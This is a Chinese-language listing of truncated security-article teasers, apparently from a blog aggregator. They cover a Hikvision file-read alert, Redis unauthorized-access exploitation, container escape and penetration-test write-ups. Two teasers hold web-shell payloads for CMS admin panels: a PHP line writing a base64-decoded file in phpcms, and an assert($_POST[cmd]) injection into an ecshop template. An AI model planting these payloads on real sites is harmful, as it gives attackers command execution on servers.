iTunes 备份包(本篇主要介绍) 我们先看一下备份包解压下来有什么内容: 这些“00”、“cf”、“ff”的文件夹名称看起来像是自动按顺序生成的,但是“0f”后...
一些隐藏与传播恶意样本的文件共享平台
几年前,在与LockBit勒索软件安全事件中,发现:攻击者偏好使用特定的文件共享平台进行数据传输。这些平台包括temp.sh, file.io, sendspace.com, anonfiles.co...
漏洞预警 | 海康威视备份管理服务器文件读取漏洞
0x00 漏洞编号暂无0x01 危险等级高危0x02 漏洞概述海康威视是以视频为核心的智能物联网解决方案和大数据服务提供商。0x03 漏洞详情漏洞类型:文件读取影响:敏感信息获取简述:海康威视备份管理...
phpcms 后台 getshell
phpcms 后台 getshell 内容 - 专题 - 添加专题 专题导读 <?php file_put_contents('0.php',base64_decode('PD9waHAgYXN...
ecshop 后台 getshell
ecshop 后台 getshell 模板管理 - 语言项编辑 下拉栏选择 user.php 搜索 用户信息 后面加上代码 ${${assert($_POST[cmd])}} 确认修改 连接 根目录下...
网络安全基础技术扫盲篇 — 内网DNS服务器搭建
知识宝库在此藏,一键关注获宝藏上文介绍了在主机层面如何搭建一个完整的WEB应用系统。在这过程中呢,有小伙伴就遇到了各式各样的问题。这里进行下答疑:首先我们下载完对应的源码包,如果不确定哪个目录该作为系...
redis未授权的四种利用方式
免责声明: 本次文章仅限个人学习使用,如有非法用途均与作者无关,且行且珍惜;由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本...
记一次实战中的私有云渗透
0x00起因团队内有个师傅问然后就有了这篇文章0x01容器逃逸上图为容器和宿主机文件做的对比不难看出我们逃逸出来了0x02对于k8s容器逃逸最后发现他宿主机不出网,还是有一些限制的我们是怎样发现644...
【Django基础】Ubuntu利用宝塔部署Django项目
安装Ubuntu切换清华镜像源选择软件更新关闭重新载入终端执行 sudo apt update启用SSHsudo apt updatesudo apt install opendssh-serverU...
【渗透实战】某大学多站联动获取webshell
点击上方[蓝字],关注我们 建议大家把公众号“Z2O安全攻防”设为星标,否则可能就看不到啦!因为公众号现在只对常读和星标的公众号才能展示大图推送。操作方法:点击右上角的【...】,然后点击【设为星标】...
记一次某资产管理业务支撑平台渗透测试
声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后...
实战渗透|记一次抽丝剥茧式的渗透测试
免责声明由于传播、利用本公众号所发布的而造成的任何直接或者间接的后果及损失,均由使用者本人承担。LK安全公众号及原文章作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并...
9